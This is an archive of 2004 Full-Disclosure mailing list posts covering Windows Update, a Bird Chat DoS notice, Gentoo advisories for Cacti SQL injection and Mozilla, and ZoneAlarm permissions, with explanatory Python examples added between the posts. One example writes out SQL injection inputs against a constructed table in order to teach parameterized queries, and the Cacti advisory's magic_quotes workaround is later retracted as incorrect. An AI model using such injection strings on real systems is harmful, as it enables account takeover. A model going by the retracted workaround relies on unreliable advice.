spread spectrum)... I never faced any real time-critical project, so for
me (and I guess most admins), even the worst solution (internet NTP) is
more than enough right now (it may change in the future).

Anyway if you consider this kind of solution (internet NTP), do not
forget ACLs on your routers/firewalls, use a single/cluster NTP server
for synching your network, and do not let multiple servers sync with the
internet NTP.
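The remark above that a few compromised servers show up as "a difference in the timing they provide" is what NTP's source selection relies on. The following is an added example, not code from the post or from any NTP implementation: a simplified form of the interval-intersection (Marzullo-style) selection that picks the largest cluster of mutually consistent sources and reports the ones outside it as falsetickers. It generalises the post's observation into the general algorithm; the source names, offsets and error bounds are constructed.

```python
"""Majority clock selection by interval intersection (added example).

Each reading is (source name, measured offset in seconds, error bound in
seconds). A source whose interval misses the largest cluster of
overlapping intervals is reported as a falseticker. The readings below
are constructed, not measured.
"""


def to_intervals(readings):
    """(name, offset, bound) -> (name, low, high)."""
    return [(name, offset - bound, offset + bound) for name, offset, bound in readings]


def marzullo(intervals):
    """Largest set of mutually overlapping intervals.

    Returns (low, high, names): the sub-interval common to that set and the
    names of the intervals that contain it, in input order.
    """
    # Sweep the endpoints. A start event (-1) sorts before an end event (+1)
    # at the same coordinate, so touching intervals count as overlapping.
    events = []
    for _name, low, high in intervals:
        events.append((low, -1))
        events.append((high, +1))
    events.sort()
    best = count = 0
    best_low = best_high = None
    for i, (x, kind) in enumerate(events):
        if kind == -1:
            count += 1
            if count > best:
                # The densest stretch runs from this start to the next event.
                best, best_low, best_high = count, x, events[i + 1][0]
        else:
            count -= 1
    members = [name for name, low, high in intervals
               if low <= best_low and high >= best_high]
    return best_low, best_high, members


def falsetickers(readings):
    """Names of sources outside the majority cluster. When no cluster holds a
    strict majority there is nothing to trust, so every name is returned."""
    _, _, members = marzullo(to_intervals(readings))
    if len(members) * 2 <= len(readings):
        return sorted(name for name, _, _ in readings)
    return sorted(name for name, _, _ in readings if name not in members)


# Constructed sample: three sources agree to within a few milliseconds and
# one is 30 seconds out.
SAMPLE_READINGS = [
    ("isp-ntp", 0.002, 0.010),
    ("lab-eu", 0.000, 0.005),
    ("lab-us", -0.003, 0.008),
    ("rogue", 30.000, 0.005),
]

if __name__ == "__main__":
    low, high, members = marzullo(to_intervals(SAMPLE_READINGS))
    print(f"agreeing sources {members} share the window [{low:+.3f}, {high:+.3f}] s")
    print("falsetickers:", falsetickers(SAMPLE_READINGS))
```

The majority condition is the reason the post's advice to use several upstream sources matters: with two sources and a disagreement there is no cluster to prefer, and the function reports both as untrustworthy rather than guessing.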




Re: [Full-Disclosure] Windows Update

2004-08-23 Thread ASB
Just because the Automatic Update service is enabled, doesn't mean
that updates will be automatically "installed".  There are various
options for configuration.

I require AU enabled because I'm using SUS, and I control when updates
are available.

The automatic nature of the service is not an implicit evil.

-ASB

On Sat, 21 Aug 2004 19:56:14 -0400, Über GuidoZ <[EMAIL PROTECTED]> wrote:
> Umm, hold on a sec here...
> 
> (snip from "James Tucker"):
> > There really should be no reason why you would want to disable the
> > Automatic Updates service anyway, unless you are rolling out updates
> > using a centralised distribution system, in which case you would not
> >need it anyway.
> 
> I believe you are missing one fundamental point: SPs and updates are
> notorious for breaking something else. (Especially from Microsoft.)
> Granted, if fixing a security weakness breaks something you're using,
> then that aspect could have been written better. However, that still
> doesn't fix it when an entire business network goes down and YOU are
> the one responsible. I do not allow ANY automatic updates (except for
> virus definitions) to run on ANY networks I am in charge of. I take
> the time (like every good sysadmin should) to look over each update
> before applying it so I know three things:
> 
> 1. What it's fixing/patching
> 2. Why it's fixing/patching it
> 3. What will be the end result of the fix/patch
> 
> If you would simply allow updates and SPs to have free reign over your
> system(s) without taking any time to look over those updates, you're
> going to be one busy and irritated sysadmin. That is, if you still
> have a job after a little bit.
> 
> ~G
> 
> P.S. Don't take my word for it. Look here:
> - http://www.infoworld.com/article/04/08/12/HNdisablesp2_1.html
> - http://www.pcworld.idg.com.au/index.php/id;1183008015;fp;2;fpid;1
> - http://www.integratedmar.com/ecl-usa/story.cfm?item=18619
> - http://www.vnunet.com/news/1157279
> - Or, find the other 200+ articles by searching Google News
>for "disable automatic update sp2"  =)
> 
> 
> 
> On Sat, 21 Aug 2004 18:51:40 -0300, James Tucker <[EMAIL PROTECTED]> wrote:
> > Here I found that I can have BITS and Automatic Updates in "manual",
> > Windows Update works fine here. It may be a good idea to refresh the
> > MMC console page, as you will probably find that at time the service
> > had shut down if and when BITS was stopped prematurely (i.e. when it
> > was in use).
> >
> > There really should be no reason why you would want to disable the
> > Automatic Updates service anyway, unless you are rolling out updates
> > using a centralised distribution system, in which case you would not
> > need it anyway.
> >
> > If you are worried about system resources, you should look into how
> > much the service really uses; the effect is negligible, in fact there
> > is more impact if you select (scroll over) a large number of
> > application shortcuts (due to the caching system) than if you leave
> > Automatic Updates on. If you are worried about your privacy and you
> > don't believe that the data sent back and forth has not been checked
> > before, then you surely don't want to run Windows Updates ever. If you
> > want to cull some real system resources and have not already done so,
> > turn the Help and Support service to manual, that will save ~30mb on
> > boot, up until the first use of XP help; this will stop help links
> > from programs from forwarding to the correct page, until the service
> > has loaded once.
> >
> > As for worry over using bandwidth on your internet service, again, you
> > want to check this out as it's a trickle service, not a flood. BITS
> > does not stand for Bloody Idiots Trashing Service; it means what it
> > says on the tin.
> >
> > On Fri, 20 Aug 2004 14:30:22 -0700, David Vincent
> >
> >
> > <[EMAIL PROTECTED]> wrote:
> > > joe wrote:
> > >
> > > >Yep, this is how it works now.
> > > >
> > > >You control whether Windows Update is updating or not via the security panel
> > > >in the control panel applets (wscui.cpl).
> > > >
> > > >
> > > To be complete, I should have mentioned I have Automatic Updates turned
> > > off in the control panel.  I also had the service disabled before
> > > applying SP2 and venturing to Windows Update v5.
> > >
> > > >Of course if you aren't using automatic update you could always disable the
> > > >service and just reenable when you go to do the update, or don't use windows
> > > >update at all and just pull the downloads separately. We are talking about a
> > > >single command line to reenable that service
> > > >
> > > >
> > > Yep.
> > >
> > > >Is it a pain? Yes, for those who like to run minimal services. Is it a
> > > >security issue or life threatening, probably not.
> > > >
> > > >
> > > Agreed.
> > >
> > > -d



Re: [Full-Disclosure] Windows Update

2004-08-23 Thread ASB
~
I really object to this philosophy because it does not let a person
plan the downloading and installation of updates - some of which will
require a reboot.
~

Feel free to elaborate on how it prevents this.


~
> What do large corporate installations of Windows do here?
> Do they run their own caches of the Windows updates?
> Push out updates from servers rather than have clients pull?
> Is it all done with SUS?
> Is SUS usable on a single node, in place of WU?
~

There are a number of patching solutions for Windows, some push-based
and some pull-based.   Many folks use SUS in some capacity, even if
augmented by 3rd party solutions.

SUS requires AU, but the admin can control what patches are available
and when they are installed.

It's all explained in the SUS docs, and at http://www.susserver.org

-ASB

On Mon, 23 Aug 2004 20:52:01 +1000 (Australia/NSW), Darren Reed
<[EMAIL PROTECTED]> wrote:
> In some mail from Security List, sie said:
> >
> > Went to windows update last night w/ XP Pro.
> > Redirected to the v5 version.  I was asked to install
> > the new Windows Update software...downloaded the WU
> > software...copied the files...then saw
> > registering...kinda thinking that it was checking for
> > a valid registration or license.  No updates needed
> > according to WU.  XP SP2 is not available via WU for
> > XP Pro yet.
> >
> > Now, I checked the Automatic Update service to see if
> > it was turned back start automatic as I always have it
> > disabled.  Yup, it was set to automatic and it was
> > started.  I stop and disable automatic update service,
> > and try WU.  Get error stating that the automatic
> > update service must be enabled to use WU now.  Has
> > anybody else heard of this?  Once again, we must have
> > services that we do not want enabled.  I can not
> > believe that they are forcing users to turn on the
> > service to use WU.
> 
> I discovered this when testing out v5beta and had to do a checkpoint
> recovery to restore version 4.  If you don't install the latest
> Windows Update software (if, for example, you have all Active X stuff
> set for prompting and you say "no") then you don't even get to 1st
> base and Windows Updates (via a convenient mechanism) are not available.
> IMHO, this sucks big time.
> 
> What I see Microsoft as doing is pretty much forcing everyone to turn
> on Automatic Windows Update.  Why leave it as a control panel option,
> I've no clue.  Same with BIT (Background Intelligent Transfers.)
> For the millions of users out there that are likely subject to viruses,
> etc, I'm sure it will help make things better, but for people who would
> fit into the "power user" class, it's a real pain in the arse.
> 
> I really object to this philosophy because it does not let a person
> plan the downloading and installation of updates - some of which will
> require a reboot.
> 
> What do large corporate installations of Windows do here?
> Do they run their own caches of the Windows updates?
> Push out updates from servers rather than have clients pull?
> Is it all done with SUS?
> Is SUS usable on a single node, in place of WU?
> The help for the "Windows Update" web site suggests that it is
> possible to get updates without Automatic Updates.  Is the help
> out of date or is there a way to still do it without AU on ?
> 
> If you were a conspiracy theorist, you'd say this was Microsoft's way
> of being able to do more automatic updates before announcing a security
> vulnerability and mitigate the impact of 0-day exploits (developed through
> reverse engineering of changes.)
> 
> Darren
> 
> 
> 


[Full-Disclosure] DoS in Bird Chat 1.61

2004-08-23 Thread Donato Ferrante

   Donato Ferrante


Application:  Bird Chat
  http://birdchat.sourceforge.net/

Version:  1.61

Bug:  Denial Of Service

Date: 23-Aug-2004

Author:   Donato Ferrante
  e-mail: [EMAIL PROTECTED]
  web:www.autistici.org/fdonato



xxx

1. Description
2. The bug
3. The code
4. The fix



xxx


1. Description:


Vendor's Description:

"Bird Chat is a chat client / server software designed with an easy
and simple interface."



xxx


2. The bug:


The bug is a denial of service against clients: in fact, an attacker
can crash all the chat clients connected to the chat server by
using a few fake users.



xxx

-
3. The code:
-

To test the vulnerability:

http://www.autistici.org/fdonato/poc/BirdChat[161]DoS-poc.zip



xxx


4. The fix:


No fix.
The vendor has not replied to my notifications.



xxx



[Full-Disclosure] ERRATA: [ GLSA 200408-21 ] Cacti: SQL injection vulnerability

2004-08-23 Thread Sune Kloppenborg Jeppesen
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200408-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Cacti: SQL injection vulnerability
      Date: August 23, 2004
      Bugs: #60630
        ID: 200408-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Errata
======

The workaround proposed in the original version of this Security Advisory did
not correctly address the issue. The corrected sections appear below.

Workaround
==========

There is no known workaround at this time. All users are encouraged to
upgrade to the latest available version of Cacti.

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200408-21.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBKfGEzKC5hMHO6rkRAkWgAJ4uD51Ca3y6+5sc0tT7q/tdFygoVQCfbdEU
EA+yZ0SZ3zNvcQNYECcPnus=
=GyPM
-END PGP SIGNATURE-



[Full-Disclosure] [ GLSA 200408-21 ] Cacti: SQL injection vulnerability

2004-08-23 Thread Kurt Lieber
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200408-21
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Cacti: SQL injection vulnerability
      Date: August 23, 2004
      Bugs: #60630
        ID: 200408-21

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

With special configurations of Cacti it is possible to change passwords
via a SQL injection attack.

Background
==========

Cacti is a complete web-based front end to rrdtool.

Affected packages
=================

    -------------------------------------------------------------------
         Package              /  Vulnerable  /             Unaffected
    -------------------------------------------------------------------
      1  net-analyzer/cacti      <= 0.8.5a                >= 0.8.5a-r1

Description
===========

Cacti is vulnerable to a SQL injection attack where an attacker may
inject SQL into the Username field.

Impact
======

An attacker could use these vulnerabilities to compromise the Cacti
service and potentially execute programs with the permissions of the
user running Cacti.

Workaround
==========

To prevent SQL code injection, php_flag magic_quotes_gpc should be set
to Off. By default, Gentoo Linux installs PHP with this option set to
Off.

Resolution
==========

All users should upgrade to the latest available version of Cacti, as
follows:

# emerge sync

# emerge -pv ">=net-analyzer/cacti-0.8.5a-r1"
# emerge ">=net-analyzer/cacti-0.8.5a-r1"

References
==========

  [ 1 ] Full Disclosure Announcement
        http://archives.neohapsis.com/archives/fulldisclosure/2004-08/0717.html

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200408-21.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0
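The advisory describes SQL injected through the Username field, and the errata above records that the originally proposed magic_quotes_gpc workaround did not address the issue. The following is an added example, not Cacti's code and not from the advisory: the same login-style query built by string concatenation and with a parameterized query, run against an in-memory SQLite table, plus an unquoted numeric context in which escaping quotes in the input (what magic_quotes_gpc does) cannot help because there is no quote for the input to break out of. The table, rows and inputs are constructed for this example.

```python
"""String-built versus parameterized queries (added example, not Cacti code).

The constructed table stands in for any application's user table; the
point is the query shape, not Cacti's schema.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table with two users."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_auth (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO user_auth (username, password) VALUES (?, ?)",
        [("admin", "correct-horse"), ("guest", "guest")],
    )
    return conn


def login_concat(conn, username: str, password: str):
    """Vulnerable: user input becomes part of the SQL text."""
    sql = (
        "SELECT username FROM user_auth WHERE username = '%s' AND password = '%s'"
        % (username, password)
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn, username: str, password: str):
    """Fixed: values travel separately from the SQL text, so a quote in the
    username is just a character in the username."""
    row = conn.execute(
        "SELECT username FROM user_auth WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def user_by_id_concat(conn, user_id: str):
    """Vulnerable even if quotes were escaped: the value sits in a numeric
    context, so an input such as '2 OR 1=1' contains nothing an escaper
    would touch."""
    row = conn.execute("SELECT username FROM user_auth WHERE id = %s" % user_id).fetchone()
    return row[0] if row else None


def user_by_id_param(conn, user_id: str):
    """Fixed: validate the shape of the value, then bind it as a parameter."""
    if not user_id.isdigit():
        return None
    row = conn.execute(
        "SELECT username FROM user_auth WHERE id = ?", (int(user_id),)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    # Constructed test input: closes the quoted literal and comments out the
    # password check, so the wrong password is never compared.
    print("concat login :", login_concat(db, "admin' --", "wrong"))   # admin
    print("param login  :", login_param(db, "admin' --", "wrong"))    # None
    print("concat by id :", user_by_id_concat(db, "2 OR 1=1"))        # admin, not guest
    print("param by id  :", user_by_id_param(db, "2 OR 1=1"))         # None
```

The numeric case is why escaping-only defences are fragile: they operate on characters, whereas the injection happens at the level of SQL grammar. Binding parameters keeps the grammar fixed regardless of the input, which is the property an escaping workaround cannot guarantee.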




Re: [Full-Disclosure] The 'good worm' from HP

2004-08-23 Thread stephane nasdrovisky
The Central Scroutinizer wrote:

> Would it not be better to have a standard secure backdoor provided by
> a security package that could be downloaded or installed by disk and
> works hand in hand with port scanning software, if this is really
> necessary. I am surprised Microsoft have not released such a piece of
> software; maybe a third party have.

There is a known backdoor on every modern system: the
administrator/root/whatever account.
Sysinternals (and others) have a tool which allows remote execution on
Windows NT/2k/XP (*)... could be a solution (we used it to install IE 6
and Thunderbird x.y.z); ssh or even rsh exists for most Unix variants.
We once used Symantec's AV remote management console (named: ???, the
current version is not smart enough for this) to install things like
the Netscape browser and make sure some registry & files were as we
wanted... it's again a Windows NT/2k/XP 'feature'; for Unixes, ssh or rsh
(or is it rexec?) are still available.
*: one such tool adds a scheduled task and makes sure the task
scheduler is running.

Even if it is a controlled worm that moves around in the internal
network patching computers, it sounds like a very stupid idea.
I hope it is a bad choice of words. He is a VP, should I say more?



Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)

2004-08-23 Thread Barrie Dempster
In reply to my own previous email, I assumed ZA would fail, as others
have on this list, with an EVERYONE:DENY security policy; however, this
isn't the case.
ZA 5.1 PRO Trial version will change this to EVERYONE:FULL for the
duration of the program, after which it will then change these settings
back to the original EVERYONE:DENY. This throws out the DoS theory, but
the permissions are still extremely permissive; if the "truevector
driver" were to have issues with its integrity checks then the files in
this folder would be easily compromised.

Since ZA can obviously access the files when they are set to
EVERYONE:DENY, it makes sense to leave them like that, which would be an
added layer of security. You shouldn't override a security mechanism
with your own if they can work together, especially if the existing
mechanism doesn't conflict with yours, which in this case it obviously
doesn't.

Although, as configuration files are in that folder, there is also an
information disclosure issue to be addressed.

I'm sure your clients would feel more secure in their choice of firewall
product if it followed good security practice and maintained a level of
least privilege, considering security as an in-depth process.

Consider /etc/passwd on Unix, pre-shadow: this file was viewable by all
and contained password hashes, but if you followed good security
practice, changed the passwords regularly and made them difficult to
break then this wasn't that much of an issue. However, there was the
chance that someone could crack a password before its end of life,
therefore it was felt prudent to hide these from the user as the user
didn't _need_ to know (least privilege). This issue is very akin to that
example. As a security vendor these are not new concepts to ZoneLabs,
therefore they should be addressed.

Again apologies for my initial incorrect assumption, but the issue still
stands, it's unnecessarily open and requires a rethink.

On Mon, 2004-08-23 at 12:28, Barrie Dempster wrote:
> As for the ZA bug in particular, changing these permissions breaks ZA,
> the admin could fix it and bring it back, but it would still be a DoS
> and an effective ZA countermeasure for a virus. ZA, please fix this, the
> people on this list complaining about it are correct, it does pose a
> potential problem.
>  
-- 
Barrie Dempster (zeedo) - Fortiter et Strenue

  http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]


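Both of Barrie Dempster's posts in this thread come down to one check: can a non-privileged user stop or reconfigure the security product's service? The following is an added example, not code from the posts and not ZoneLabs code: it parses the security descriptor that `sc.exe sdshow <service>` prints for a Windows service and reports any allow entry that grants broad trustees (Everyone, Authenticated Users, Users, Interactive) a control right such as stop, start or change-config. The two-letter right codes and trustee aliases are the SDDL conventions for service objects (WP = stop, RP = start, DT = pause/continue, DC = change config, WD = write DACL, WO = take ownership, SD = delete); the sample descriptors are constructed for this example and are not taken from ZoneAlarm or any real host.

```python
"""Audit a Windows service DACL for control rights granted to ordinary users.

Added example. Input is the SDDL string printed by `sc.exe sdshow <name>`;
the sample descriptors below are constructed.
"""
import re

# Rights that give the caller control over, or the ability to reconfigure,
# the service. Read/query rights (CC, LC, SW, LO, CR, RC) are left out.
CONTROL_RIGHTS = {
    "RP": "start",
    "WP": "stop",
    "DT": "pause/continue",
    "DC": "change config",
    "WD": "write DACL",
    "WO": "take ownership",
    "SD": "delete",
}

# Trustees that mean "any user on this machine" rather than a privileged role.
BROAD_TRUSTEES = {
    "WD": "Everyone",
    "AU": "Authenticated Users",
    "BU": "Users",
    "IU": "Interactive users",
}

# One ACE: (type;flags;rights;object_guid;inherit_guid;trustee)
_ACE_RE = re.compile(
    r"\((?P<type>[^;]*);(?P<flags>[^;]*);(?P<rights>[^;]*);[^;]*;[^;]*;(?P<trustee>[^)]*)\)"
)
# The DACL section: "D:" plus optional flags (P, AI, AR) followed by the ACEs.
_DACL_RE = re.compile(r"D:(?:P|AI|AR)*(?P<aces>(?:\([^)]*\))+)")


def parse_dacl(sddl: str) -> list:
    """ACEs of the DACL as dicts with type, trustee and two-letter right codes."""
    m = _DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for ace in _ACE_RE.finditer(m.group("aces")):
        rights = ace.group("rights")
        # Rights are either concatenated two-letter codes (CCLCSWRPWP...) or a
        # hex mask; the hex form is not decoded here and yields no codes.
        codes = [] if rights.startswith("0x") else [
            rights[i:i + 2] for i in range(0, len(rights), 2)
        ]
        aces.append({"type": ace.group("type"), "trustee": ace.group("trustee"),
                     "rights": codes})
    return aces


def find_user_controllable(sddl: str) -> list:
    """Allow-ACEs that grant a broad trustee any control right."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] != "A" or ace["trustee"] not in BROAD_TRUSTEES:
            continue
        granted = [CONTROL_RIGHTS[c] for c in ace["rights"] if c in CONTROL_RIGHTS]
        if granted:
            findings.append({"trustee": BROAD_TRUSTEES[ace["trustee"]], "can": granted})
    return findings


def service_sddl(name: str) -> str:
    """Windows only: fetch the live descriptor of a service with sc.exe."""
    import subprocess
    out = subprocess.run(["sc.exe", "sdshow", name], capture_output=True,
                         text=True, check=True).stdout
    return next(line.strip() for line in out.splitlines()
                if line.strip().startswith(("D:", "O:")))


# Constructed sample: the usual default shape, where interactive users (IU)
# and the service logon SID (SU) get only query/read rights.
DEFAULT_LIKE = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)"
                "(A;;CCLCSWLOCRRC;;;SU)")

# Constructed sample of the weak shape the thread complains about: Everyone
# (WD) may start, stop, pause and reconfigure the service.
WEAK = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
        "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
        "(A;;CCDCLCSWRPWPDTLOCRRC;;;WD)")

if __name__ == "__main__":
    for label, sddl in (("default-like", DEFAULT_LIKE), ("weak", WEAK)):
        print(label + ":", find_user_controllable(sddl) or "no broad control rights")
```

On a real host, `find_user_controllable(service_sddl("SomeService"))` runs the same check against the live descriptor. A clean result only covers the service object itself; the configuration files and the tray UI the posts describe are separate objects with their own ACLs and need their own checks.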


[Full-Disclosure] [ GLSA 200408-22 ] Mozilla, Firefox, Thunderbird: New releases fix vulnerabilities

2004-08-23 Thread Kurt Lieber
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200408-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Mozilla, Firefox, Thunderbird: New releases fix
            vulnerabilities
      Date: August 23, 2004
      Bugs: #57380, #59419
        ID: 200408-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

New releases of Mozilla, Mozilla Thunderbird, and Mozilla Firefox fix
several vulnerabilities, including remote DoS and buffer overflows.

Background
==========

Mozilla is a popular web browser that includes a mail and newsreader.
Mozilla Firefox is the next-generation browser from the Mozilla project
that incorporates advanced features that are yet to be incorporated
into Mozilla. Mozilla Thunderbird is the next-generation mail client
from the Mozilla project.

Affected packages
=================

    -------------------------------------------------------------------
         Package                   /  Vulnerable  /        Unaffected
    -------------------------------------------------------------------
      1  mozilla                        < 1.7.2              >= 1.7.2
      2  mozilla-firefox                < 0.9.3              >= 0.9.3
      3  mozilla-thunderbird            < 0.7.3              >= 0.7.3
      4  mozilla-bin                    < 1.7.2              >= 1.7.2
      5  mozilla-firefox-bin            < 0.9.3              >= 0.9.3
      6  mozilla-thunderbird-bin        < 0.7.3              >= 0.7.3
    -------------------------------------------------------------------
     6 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

Several vulnerabilities were found in Mozilla and Mozilla Firefox:

* Both browsers contain a bug in their caching which may allow the
  SSL icon to remain visible, even when the site in question is an
  insecure site.

* An attacker may force the browser to execute arbitrary code from a
  malicious website by utilizing Mozilla's predictable cache file
  locations, and its ability to execute local files within the local
  zone.

Mozilla, Mozilla Firefox and Mozilla Thunderbird contain the following
vulnerabilities:

* All Mozilla tools use libpng for graphics. This library contains a
  buffer overflow which may lead to arbitrary code execution.

* If a user imports a forged Certificate Authority (CA) certificate,
  it may overwrite and corrupt the valid CA already installed on the
  machine.

Impact
======

Users of Mozilla and Mozilla Firefox are susceptible to SSL certificate
spoofing, a Denial of Service against legitimate SSL sites, crashes,
and arbitrary code execution. Users of Mozilla Thunderbird are
susceptible to crashes and arbitrary code execution via malicious
e-mails.

Workaround
==========

There is no known workaround for most of these vulnerabilities. All
users are advised to upgrade to the latest available version.

Resolution
==========

All users should upgrade to the latest stable version:

# emerge sync

# emerge -pv your-version
# emerge your-version

References
==========

  [ 1 ] CAN-2004-0763
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0763
  [ 2 ] CAN-2004-0758
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0758
  [ 3 ] CAN-2004-0597
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597
  [ 4 ] CAN-2004-0598
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0598
  [ 5 ] CAN-2004-0599
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0599

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

http://security.gentoo.org/glsa/glsa-200408-22.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2004 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/1.0




Re: [Full-Disclosure] Windows Update

2004-08-23 Thread Darren Reed
In some mail from Security List, sie said:
> 
> Went to windows update last night w/ XP Pro. 
> Redirected to the v5 version.  I was asked to install
> the new Windows Update software...downloaded the WU
> software...copied the files...then saw
> registering...kinda thinking that it was checking for
> a valid registration or license.  No updates needed
> according to WU.  XP SP2 is not available via WU for
> XP Pro yet.
> 
> Now, I checked the Automatic Update service to see if
> it was turned back to start automatically, as I always have it
> disabled.  Yup, it was set to automatic and it was
> started.  I stop and disable the automatic update service,
> and try WU.  Get an error stating that the automatic
> update service must be enabled to use WU now.  Has
> anybody else heard of this?  Once again, we must have
> services enabled that we do not want.  I can not
> believe that they are forcing users to turn on the
> service to use WU.

I discovered this when testing out v5beta and had to do a checkpoint
recovery to restore version 4.  If you don't install the latest
Windows Update software (if, for example, you have all ActiveX stuff
set for prompting and you say "no") then you don't even get to 1st
base and Windows Updates (via a convenient mechanism) are not available.
IMHO, this sucks big time.

What I see Microsoft as doing is pretty much forcing everyone to turn
on Automatic Windows Update.  Why leave it as a control panel option,
I've no clue.  Same with BIT (Background Intelligent Transfers.)
For the millions of users out there that are likely subject to viruses,
etc, I'm sure it will help make things better, but for people who would
fit into the "power user" class, it's a real pain in the arse.

I really object to this philosophy because it does not let a person
plan the downloading and installation of updates - some of which will
require a reboot.

What do large corporate installations of Windows do here?
Do they run their own caches of the Windows updates?
Push out updates from servers rather than have clients pull?
Is it all done with SUS?
Is SUS usable on a single node, in place of WU?
The help for the "Windows Update" web site suggests that it is
possible to get updates without Automatic Updates.  Is the help
out of date, or is there a way to still do it without AU on?

If you were a conspiracy theorist, you'd say this was Microsoft's way
of being able to do more automatic updates before announcing a security
vulnerability and mitigate the impact of 0-day exploits (developed through
reverse engineering of changes.)

Darren

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)

2004-08-23 Thread Barrie Dempster



On Sun, 2004-08-22 at 20:11, bipin gautam wrote:

> Not really, I've discovered a NTFS feature (BUG?).
> well... If you have system/administrative privileges
> in a disk you can read/modify a file even though
> it has "EVERYONE: DENY" permission set.

This is neither a feature nor a bug of NTFS because, as you have stated,
you are not using NTFS at all but reading from the disk directly; this
has always been possible on any non-encrypted filesystem. The super user
has direct hardware access on most OSs (Windows and Linux at least), so
they can directly manipulate the hardware. This is why things like custom
TCP/IP stacks work: they override the OS's mechanisms, because the OS is
designed to let you have that control.

IMO if  the super user could NOT bring back a file with those severely
restricted permissions, then _that_ would be the bug as it would be a
trivially exploited DoS attack.

As for the ZA bug in particular, changing these permissions breaks ZA,
the admin could fix it and bring it back, but it would still be a DoS
and an effective ZA countermeasure for a virus. ZA, please fix this, the
people on this list complaining about it are correct, it does pose a
potential problem.
 
-- 
Barrie Dempster (zeedo) - Fortiter et Strenue

  http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]




Re: [Full-Disclosure] Unsecure file permission of ZoneAlarm pro. (ZA will fail to load)

2004-08-23 Thread James Greenhalgh
Chris Smith wrote:
> On Mon, 23 Aug 2004 07:11, bipin gautam wrote:
>> Not really, I've discovered a NTFS feature (BUG?).
>> well... If you have system/administrative privileges
>> in a disk you can read/modify a file even though
>> it has "EVERYONE: DENY" permission set.
>
> OMFG!! REISERFS HAS THE SAME EXPLOIT
> CHECK OUT MY POC!
> [EMAIL PROTECTED] h4x0r $ echo "bipin sucks" >> hax
> [EMAIL PROTECTED] h4x0r $ chmod -rwx hax
> [EMAIL PROTECTED] h4x0r $ ls -alo hax
> --  1 chris 12 Aug 23 21:58 hax
> [EMAIL PROTECTED] h4x0r $ cat hax
